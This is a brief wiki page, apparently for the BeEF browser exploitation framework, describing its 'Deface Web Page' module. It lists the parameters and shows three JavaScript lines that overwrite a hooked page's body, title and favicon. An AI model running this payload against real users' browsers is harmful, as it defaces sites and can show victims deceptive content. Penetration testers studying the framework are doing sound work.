Module: Deface Web Page - h4sh5/beef GitHub Wiki
Summary
-
Objective: Overwrite the page, title and shortcut icon on the hooked page.
-
Date: ???
-
Authors: antisnatchor
-
Parameters:
- New Title
- New Favicon
- Deface Content: the HTML content to replace original page with
-
Browsers: All (User will be notified)
Internal Working
This command modify the HTML, the title and the favicon of the page with the parameters given :
document.body.innerHTML = "<%= @deface_content %>";
document.title = "<%= @deface_title %>";
beef.browser.changeFavicon("<%= @deface_favicon %>");